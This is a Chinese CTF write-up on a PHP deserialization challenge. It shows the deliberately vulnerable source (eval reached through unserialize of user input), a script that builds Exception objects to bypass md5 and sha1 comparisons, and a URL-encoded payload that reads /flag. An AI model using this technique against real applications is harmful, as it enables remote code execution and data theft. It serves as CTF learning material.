成理信安協會題目反序列化02
明面上看著不可能的題一般就預示著有空子可鑽。
直接上原始碼###
<?php show_source(__FILE__); class CDUTSEC { public $var1; public $var2; function __construct($var1, $var2) { $var1 = $var1; $var2 = $var2; } function __destruct() { echo md5($this->var1); echo md5($this->var2); if (($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1) === sha1($this->var2))) { eval($this->var1); } } } unserialize($_GET['payload']);
程式碼審計###
一看,很好嘛,兩個變數原值弱比較不同但md5與sha1編碼後要求強比較相等。想到陣列繞過,但是eval執行的需要是字串,陣列轉為字串後就只剩下:Array 了,顯然陣列繞過行不通,在加上這邊同時使用了MD5 和 sha1 我們想要利用 fastcoll 來碰撞也不行了。怎麼搞?
無內鬼,直接祭出大佬部落格
利用 Exception類 繞過md5 sha1 等系列 https://mayi077.gitee.io/2020/08/14/%E5%88%A9%E7%94%A8-Exception%E7%B1%BB-%E7%BB%95%E8%BF%87md5-sha1-%E7%AD%89%E7%B3%BB%E5%88%97/
然後根據部落格寫出的指令碼:###
<?php class CDUTSEC { public $var1; public $var2; // function __construct($a, $b) // { // $var1 = $var1; // $var2 = $var2; // } // function __destruct() // { // echo md5($this->var1); // echo md5($this->var2); // if (($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1) === sha1($this->var2))) // { // eval($this->var1); // } // } } $cmd="readfile('/flag');?>"; $a = new Exception($cmd);$b = new Exception($cmd,1); $tr = new CDUTSEC(); $tr->var1=$a; $tr->var2=$b; echo urlencode(serialize($tr));
這裡要urlencode的原因是直接序列化的字串有些在文字下是亂碼。url編碼一下保證我們拿到的payload不丟失不出錯。
另外,本題ban了幾個常用的拿flag的函式,我們傳入的命令在$cmd處修改,建議先傳'phpinfo();?>',一來成不成功好分辨,二來看看有沒有ban常用函式。
最後我們用readfile函式讀到flag。
payload:O%3A7%3A%22CDUTSEC%22%3A2%3A%7Bs%3A4%3A%22var1%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22readfile%28%27%2Fflag%27%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A48%3A%22D%3A%5Cphpstudy_pro%5CWWW%5CCTFphp%5C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%A2%9802.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A24%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7Ds%3A4%3A%22var2%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22readfile%28%27%2Fflag%27%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A48%3A%22D%3A%5Cphpstudy_pro%5CWWW%5CCTFphp%5C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%A2%9802.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A24%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D%7D
沒啥好說的,刷的題中積累的小知識點而已。(笑)